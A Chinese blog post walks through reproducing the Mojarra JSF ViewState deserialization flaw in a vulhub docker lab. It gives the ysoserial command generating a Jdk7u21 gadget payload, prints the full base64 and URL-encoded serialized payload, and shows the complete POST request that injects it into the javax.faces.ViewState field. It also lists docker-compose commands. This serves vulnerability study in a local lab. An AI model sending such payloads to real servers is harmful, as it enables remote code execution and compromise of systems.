Mojarra JSF ViewState 反序列化漏洞

最新推荐文章于 2024-04-26 09:57:07 发布
最新推荐文章于 2024-04-26 09:57:07 发布
阅读量2.1k 收藏
点赞数 2
分类专栏: 中间件漏洞复现 文章标签: viewstate 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/111824424
版权

声明

好好学习,天天向上

漏洞描述

JavaServer Faces (JSF) 是一种用于构建 Web 应用程序的标准,Mojarra是一个实现了JSF的框架。在其2.1.29-08、2.0.11-04版本之前,没有对JSF中的ViewState进行加密,进而导致攻击者可以构造恶意的序列化ViewState对象对服务器进行攻击。

影响范围

2.1.29-08前

2.0.11-04前

复现过程

这里使用2.1.28版本

使用vulhub

/app/vulhub-master/mojarra/jsf-viewstate-deserialization

使用docker启动

docker-compose build
docker-compose up -d

环境启动后,访问

http://192.168.239.129:8080

使用yso生成payload

java -jar ysoserial-master-SNAPSHOT.jar Jdk7u21 "touch /tmp/JSF" | gzip | base64 -w 0

生成的paylload

H4sIAAAAAAAAA61Wy28bRRj/xk5sxzjP5tlHmtKWPKC7zbMpjmjzIK2LQyKcphI+mPF6Ym+73t3uziYbJHrjD0ConLkAB8KhF1r1gFRxa7kgIYGKKsGFG3CokLjw+GZ3E0dJqN3SlXZn9nvN933zm2++zV+h3rag6ypdo5LDVU1Kq/o1VrhI7VKG8R+079+++WioNwTgWtBakQr4d+fev/nRndtjYeSb6wkAaDl3HsQTQquvKkZZsh1dMqyiRE2qlJjkUo3qkqpzZulUk1xb44rELepKy6xsapQzO4Vjw5XFe/rm56NhiKSgMafqBabzN51ynlkpaMqhgm5rjKeQ7mYhnstvcKYYBWZzCGezM1mI5BSN2vjblk0Lt2VctijPCloyDfU5nZYZMnfwMtxS9SIyW3OGw02HL1mGySyuCqOdvqCIXa7Qk64pYv0HH8fyFn7jr56OYvHHMyJhghdCeig7s/m4689IbPmngBz5+P7fd79C9gicjUMYXozCmSicjMJLBFpsZqlUW2GWrRr65dQcAXKJQOOsoduc6nyFag6r/6Lvw8cfPPr9NQKRKVVXOU7CA4MrBOpmMQsEmnEbmZ+vZZrXkNKWNhQ0S9E4/gfEOl5SbQIHMtzJLwc5XaIbmkELBBIpXWeWlzKGQuPpDdvwnZNNX8b2E3KBFoqM2yf2sZIk0OBt1qphlQlYA2nEhIyYkBETso8J2cOEvIUJ2cOEPLe4kMzuK13WKrK+P+q7zJIzwZRyzNtFqhc0ZiVFSmIFQ3HKiB8Cp55qeVQt+XYw/Jn/7wyB+OuuwkxBs6PQT+DTp8tHVQ8KvCzPLS9Mu6qdQhLlhlVdqaYcqoE5gYNn8YJANMglgennkcmM4VgKm1cFjBMBAiVxSBMQhxeiMEBg9BkAS+B8rTtiOTpXy0yeztsIcYVvWSLQ7hUL1ag47522s7Va3rK0jRYCR6vEgls0pWhBKWitVLW3fCejMIQ5Q8Hgn0DHwGB6j1gyAa/AqTi8DBKBJm44SqlP5mVTvpSZj8FpLBjMZQqB/oG9hXOnOSyRCsNKm8AKNyrMjWEFy3CqXFugZlB7DlciWlrHQjM6OTo8PD46PDY+OTFCoDf9JH4SjkEIKyd6hO9BqIcIjlFRcSHm0RAE+BVXkowjwbF+6DaQW55II34jHlGGJvwmfAFohkkcsSBCO0oJ5XP4hgVtt+KYp9jnMwNFMeuATo9PoAu6UaMH576PwuyhwGzKo+5jdtIzO+Qz9zV7GI6ghpj1wlFcvrJADAa3gz6BHCHV/BmESfoOyG3DX8L4lVue4oQXFBESfd76x6AVxziyQnAcWqDBuQ430BaQ77ZvqkPipuqIQlcUuqPQU+tNdf0X9bep8oXu53NThecNY8/NdLLqzYRatdSMgwSO12AKQ69AfTF/lSn/fearndsn4pjUjuOpXThu8/gHvG/7jt3tFLtrcqjDM2WZ6wRc+z0PE0eE/66EZVjavrArPZm71SOKmCWLrWoYtITH3N34uf9h3zctsw9CQNJAShy3o5KdQFJO6Wu4qTtLuGtihzgiusMta1TXDe7JSNPb0z2Kl+//0dzx4MYnIQilIVFmAjge0rBLa97RpWGhwV6ujm+Y2Oe17ukBveV3NbSoUh99eO/rzne+xaMxD3GxXfNY2Q1sOht4yWJ2ydAKrhn0uIn1mOh4Rfo4xFbH6TidOD0pTk7MXbOqZBQqj2u6/wIGxTWyiAsAAA==

在进行URL编码

H4sIAAAAAAAAA61Wy28bRRj%2fxk5sxzjP5tlHmtKWPKC7zbMpjmjzIK2LQyKcphI%2bmPF6Ym%2b73t3uziYbJHrjD0ConLkAB8KhF1r1gFRxa7kgIYGKKsGFG3CokLjw%2bGZ3E0dJqN3SlXZn9nvN933zm2%2b%2bzV%2bh3rag6ypdo5LDVU1Kq%2fo1VrhI7VKG8R%2b079%2b%2b%2bWioNwTgWtBakQr4d%2bfev%2fnRndtjYeSb6wkAaDl3HsQTQquvKkZZsh1dMqyiRE2qlJjkUo3qkqpzZulUk1xb44rELepKy6xsapQzO4Vjw5XFe%2frm56NhiKSgMafqBabzN51ynlkpaMqhgm5rjKeQ7mYhnstvcKYYBWZzCGezM1mI5BSN2vjblk0Lt2VctijPCloyDfU5nZYZMnfwMtxS9SIyW3OGw02HL1mGySyuCqOdvqCIXa7Qk64pYv0HH8fyFn7jr56OYvHHMyJhghdCeig7s%2fm4689IbPmngBz5%2bP7fd79C9gicjUMYXozCmSicjMJLBFpsZqlUW2GWrRr65dQcAXKJQOOsoduc6nyFag6r%2f6Lvw8cfPPr9NQKRKVVXOU7CA4MrBOpmMQsEmnEbmZ%2bvZZrXkNKWNhQ0S9E4%2fgfEOl5SbQIHMtzJLwc5XaIbmkELBBIpXWeWlzKGQuPpDdvwnZNNX8b2E3KBFoqM2yf2sZIk0OBt1qphlQlYA2nEhIyYkBETso8J2cOEvIUJ2cOEPLe4kMzuK13WKrK%2bP%2bq7zJIzwZRyzNtFqhc0ZiVFSmIFQ3HKiB8Cp55qeVQt%2bXYw%2fJn%2f7wyB%2bOuuwkxBs6PQT%2bDTp8tHVQ8KvCzPLS9Mu6qdQhLlhlVdqaYcqoE5gYNn8YJANMglgennkcmM4VgKm1cFjBMBAiVxSBMQhxeiMEBg9BkAS%2bB8rTtiOTpXy0yeztsIcYVvWSLQ7hUL1ag47522s7Va3rK0jRYCR6vEgls0pWhBKWitVLW3fCejMIQ5Q8Hgn0DHwGB6j1gyAa%2fAqTi8DBKBJm44SqlP5mVTvpSZj8FpLBjMZQqB%2foG9hXOnOSyRCsNKm8AKNyrMjWEFy3CqXFugZlB7DlciWlrHQjM6OTo8PD46PDY%2bOTFCoDf9JH4SjkEIKyd6hO9BqIcIjlFRcSHm0RAE%2bBVXkowjwbF%2b6DaQW55II34jHlGGJvwmfAFohkkcsSBCO0oJ5XP4hgVtt%2bKYp9jnMwNFMeuATo9PoAu6UaMH576PwuyhwGzKo%2b5jdtIzO%2bQz9zV7GI6ghpj1wlFcvrJADAa3gz6BHCHV%2fBmESfoOyG3DX8L4lVue4oQXFBESfd76x6AVxziyQnAcWqDBuQ430BaQ77ZvqkPipuqIQlcUuqPQU%2btNdf0X9bep8oXu53NThecNY8%2fNdLLqzYRatdSMgwSO12AKQ69AfTF%2flSn%2ffearndsn4pjUjuOpXThu8%2fgHvG%2f7jt3tFLtrcqjDM2WZ6wRc%2bz0PE0eE%2f66EZVjavrArPZm71SOKmCWLrWoYtITH3N34uf9h3zctsw9CQNJAShy3o5KdQFJO6Wu4qTtLuGtihzgiusMta1TXDe7JSNPb0z2Kl%2b%2f%2f0dzx4MYnIQilIVFmAjge0rBLa97RpWGhwV6ujm%2bY2Oe17ukBveV3NbSoUh99eO%2frzne%2bxaMxD3GxXfNY2Q1sOht4yWJ2ydAKrhn0uIn1mOh4Rfo4xFbH6TidOD0pTk7MXbOqZBQqj2u6%2fwIGxTWyiAsAAA%3D%3D

然后首页,提交表单,修改其中javax.faces.ViewState字段的值为上述Payload

POST /index.xhtml HTTP/1.1
Host: 192.168.239.129:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.129:8080/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1923

j_idt6=j_idt6&j_idt6%3Aj_idt7=aaaa&j_idt6%3Aj_idt8=Hello&javax.faces.ViewState=H4sIAAAAAAAAA61Wy28bRRj%2fxk5sxzjP5tlHmtKWPKC7zbMpjmjzIK2LQyKcphI%2bmPF6Ym%2b73t3uziYbJHrjD0ConLkAB8KhF1r1gFRxa7kgIYGKKsGFG3CokLjw%2bGZ3E0dJqN3SlXZn9nvN933zm2%2b%2bzV%2bh3rag6ypdo5LDVU1Kq%2fo1VrhI7VKG8R%2b079%2b%2b%2bWioNwTgWtBakQr4d%2bfev%2fnRndtjYeSb6wkAaDl3HsQTQquvKkZZsh1dMqyiRE2qlJjkUo3qkqpzZulUk1xb44rELepKy6xsapQzO4Vjw5XFe%2frm56NhiKSgMafqBabzN51ynlkpaMqhgm5rjKeQ7mYhnstvcKYYBWZzCGezM1mI5BSN2vjblk0Lt2VctijPCloyDfU5nZYZMnfwMtxS9SIyW3OGw02HL1mGySyuCqOdvqCIXa7Qk64pYv0HH8fyFn7jr56OYvHHMyJhghdCeig7s%2fm4689IbPmngBz5%2bP7fd79C9gicjUMYXozCmSicjMJLBFpsZqlUW2GWrRr65dQcAXKJQOOsoduc6nyFag6r%2f6Lvw8cfPPr9NQKRKVVXOU7CA4MrBOpmMQsEmnEbmZ%2bvZZrXkNKWNhQ0S9E4%2fgfEOl5SbQIHMtzJLwc5XaIbmkELBBIpXWeWlzKGQuPpDdvwnZNNX8b2E3KBFoqM2yf2sZIk0OBt1qphlQlYA2nEhIyYkBETso8J2cOEvIUJ2cOEPLe4kMzuK13WKrK%2bP%2bq7zJIzwZRyzNtFqhc0ZiVFSmIFQ3HKiB8Cp55qeVQt%2bXYw%2fJn%2f7wyB%2bOuuwkxBs6PQT%2bDTp8tHVQ8KvCzPLS9Mu6qdQhLlhlVdqaYcqoE5gYNn8YJANMglgennkcmM4VgKm1cFjBMBAiVxSBMQhxeiMEBg9BkAS%2bB8rTtiOTpXy0yeztsIcYVvWSLQ7hUL1ag47522s7Va3rK0jRYCR6vEgls0pWhBKWitVLW3fCejMIQ5Q8Hgn0DHwGB6j1gyAa%2fAqTi8DBKBJm44SqlP5mVTvpSZj8FpLBjMZQqB%2foG9hXOnOSyRCsNKm8AKNyrMjWEFy3CqXFugZlB7DlciWlrHQjM6OTo8PD46PDY%2bOTFCoDf9JH4SjkEIKyd6hO9BqIcIjlFRcSHm0RAE%2bBVXkowjwbF%2b6DaQW55II34jHlGGJvwmfAFohkkcsSBCO0oJ5XP4hgVtt%2bKYp9jnMwNFMeuATo9PoAu6UaMH576PwuyhwGzKo%2b5jdtIzO%2bQz9zV7GI6ghpj1wlFcvrJADAa3gz6BHCHV%2fBmESfoOyG3DX8L4lVue4oQXFBESfd76x6AVxziyQnAcWqDBuQ430BaQ77ZvqkPipuqIQlcUuqPQU%2btNdf0X9bep8oXu53NThecNY8%2fNdLLqzYRatdSMgwSO12AKQ69AfTF%2flSn%2ffearndsn4pjUjuOpXThu8%2fgHvG%2f7jt3tFLtrcqjDM2WZ6wRc%2bz0PE0eE%2f66EZVjavrArPZm71SOKmCWLrWoYtITH3N34uf9h3zctsw9CQNJAShy3o5KdQFJO6Wu4qTtLuGtihzgiusMta1TXDe7JSNPb0z2Kl%2b%2f%2f0dzx4MYnIQilIVFmAjge0rBLa97RpWGhwV6ujm%2bY2Oe17ukBveV3NbSoUh99eO%2frzne%2bxaMxD3GxXfNY2Q1sOht4yWJ2ydAKrhn0uIn1mOh4Rfo4xFbH6TidOD0pTk7MXbOqZBQqj2u6%2fwIGxTWyiAsAAA%3D%3D

在这里插入图片描述

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Mojarra JSF ViewState 序列漏洞复现
0xSec
01-10 1560
JavaServer Faces,新一代的Java Web应用技术标准,吸收了很多Java Servlet以及其他的Web应用框架的特性。JSF为Web应用开发定义了一个事件驱动的、基于组件的模型。其中最常用的是Sun(现在的Oracle)发布的Mojarra和Apache发布的MyFacesJavaServerFaces(JSF)概念在几年前就已经引入,现在主要在J2EE中使用。
Node.js目录穿越漏洞(CVE-2017-14849)
m0_65247093的博客
05-26 1193
影响版本(wappalyzer) Node.js 8.5.0 + Express 3.19.0-3.21.2 Node.js 8.5.0 + Express 4.11.0-4.15.5 Express框架: Express是基于Node.js平台,快速、开放、极简的web开发框架 漏洞本质: 原因是 Node.js 8.5.0 对目录进行normalize操作时出现了逻辑错误,导致向上层跳跃的时候(如../../../../../../etc/passwd),在中间位置增加foo/../(...
Java安全之Mojarra JSF序列
最新发布
Ly768768的博客
04-26 1315
JavaServer Faces,新一代的Java Web应用技术标准,吸收了很多Java Servlet以及其他的Web应用框架的特性。JSF为Web应用开发定义了一个事件驱动的、基于组件的模型。其中常用的是Sun(现在的Oracle)发布的Mojarra和Apache发布的MyFacesJavaServerFaces(JSF)概念在几年前就已经引入,现在主要在J2EE中使用。
【转】ASP.NET ViewState详解
CPU_2的专栏
08-07 1039
作者:Infinities Loop 概述 ViewState是一个被误解很深的动物了。我希望通过此文章来澄清人们对ViewState的一些错误认识。为了达到这个目的,我决定从头到尾详细的描述一下整个ViewState的工作机制,其中我会同时用一些例子说明我文章中的观点,结论
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
主要介绍了浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤),小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
关于viewstate保护问题
五十三参
10-25 424
<br />常用保护viewstate有两种方式: <br />1、防篡改 <br />防篡改,使用散列代码. <br />在页面顶部加入如下代码:Page EnableViewStateMAC=true <br />asp.net就会自动的在viewstate中追加一个散列码,<br />在页面回传时,服务器根据回传的viewstate生成一个散列码,<br />再与回传的散列码相比较,如果不对,则丢弃该viewstate,同时控件将恢复初试状态. <br />(默认情况下asp.net是通过SHA1算法
JSF 2.0 (Mojarra 2.0.2-FCS)
10-11
在“JSF 2.0 (Mojarra 2.0.2-FCS)”这个压缩包中,包含的是Mojarra实现的JSF 2.0框架的具体实现文件,可供开发者在项目中引用和学习。下载这个版本,可以避免因网络问题而无法获取到这个稳定版本的烦恼。开发者可以...
Mojarra JSF2.0库文件
04-10
Mojarra JSF 2.0是针对JSF 2.0规范的实现库,包含了处理JSF生命周期、渲染组件以及与其他Java EE技术集成所需的所有类和接口。将Mojarra JSF 2.0库文件放置在Web应用的`WEB-INF/lib`目录下,是为了让应用服务器能够...
glassfish 如何更新 mojarra JSF實作1
08-08
glassfish 如何更新 mojarra JSF實作1
mojarra_web项目需要的包_jsf-impl.jar_
09-29
在实际开发中,Mojarra与`jsf-api.jar` 一起使用,为开发者提供了一个完整的JSF 2.0运行环境。 **使用JSF构建Web项目** 在Web项目中,将`jsf-api.jar` 和 `jsf-impl.jar` 添加到项目的类路径中,就可以开始使用JSF...
JSF2.0源代码
10-13
在本文中,我们将深入探讨JSF 2.0的源代码,特别是mojarra实现,这是JSF规范的主要参考实现。 **一、MojarraJSF的核心实现** MojarraJSF最广泛使用的实现,它为JSF规范提供了具体的功能实现。在提供的文件`...
JSF的工作方式和调试方式–可以使用polyglot吗?
最佳 Java 编程
05-24 246
JSF不是我们通常认为的那样。 这也是一个调试起来可能有些棘手的框架,尤其是在初次遇到时。 在这篇文章中,让我们继续探讨为什么会出现这种情况,并提供一些JSF调试技术。 我们将讨论以下主题: JSF不是我们经常想到的 JSF调试的难点 如何系统地调试JSF JSF的工作原理– JSF生命周期 从浏览器调试Ajax请求到服务器再返回 调试JSF前端Javascript...
HTML不能直接发送POST请求,如何在不使用HTML表单的情况下以编程方式向JSF页面发送POST请求?...
weixin_34065550的博客
06-16 244
我有非常简单的JSF bean,如下所示:import org.jboss.seam.annotations.Name;@Name(Sample.NAME)public class Sample {public static final String NAME="df";private String text = "text-test";public void sampleM(){System.o...
真正理解ViewState
工作笔记
05-29 7007
如果不注意ViewState会对应用带来很多不利的影响:- 泄漏重要的数据- ViewState攻击- 性能受影响- 应用程序不能扩展:如果用户会在每一次Postback的时候都加少50K的ViewState数据。。。- 影响整体设计ViewState干些啥:- 存值- 跟踪变1. 保存键-值对,和Hash表一样用。ViewState是定义在System.Web.UI.Control上的一个pr
Spring Cloud Config 目录穿越漏洞(CVE-2020-5410)复现
thelostworld
02-20 1860
Spring Cloud Config 目录穿越漏洞 (CVE-2020-5410) ​ 一、漏洞简介 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。 二、影响版本 Spring Cloud Config: 2.2.0 to 2.2.2 Spring Cl..
序列漏洞汇总
热门推荐
weixin_29324013的博客
07-03 4万+
序列漏洞汇总1、概述序列是让Java对象脱离Java运行环境的一种手段,可以有效的实现多平台之间的通信、对象持久存储。 Java 序列是指把 Java 对象转换为字节序列的过程,便于保存在内存、文件、数据库中,ObjectOutputStream类的 writeObject() 方法可以实现序列序列是指把字节序列恢复为 Java 对象的过程,ObjectInputStream 类...
浅谈ViewState
我在等那么一天的博客
11-04 1万+
一、什么是ViewState 二、使用
kali中如何下载jsf
04-16
在Kali Linux中,你可以使用以下步骤下载JSF(JavaServer Faces): 1. 打开终端并更新软件包列表: ``` sudo apt update ``` 2. 安装JSF的开发包(Mojarra): ``` sudo apt install libmojarra-java ``` 3. 下载JSF的示例应用程序(例如,HelloWorld): ``` sudo apt install libmojarra2-java-doc ``` 4. 进入示例应用程序的目录: ``` cd /usr/share/doc/libmojarra2-java-doc/examples/ ``` 5. 在浏览器中打开示例应用程序的URL,例如: ``` firefox file:///usr/share/doc/libmojarra2-java-doc/examples/helloworld/index.html ``` 这样,你就可以在Kali Linux中下载和使用JSF了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值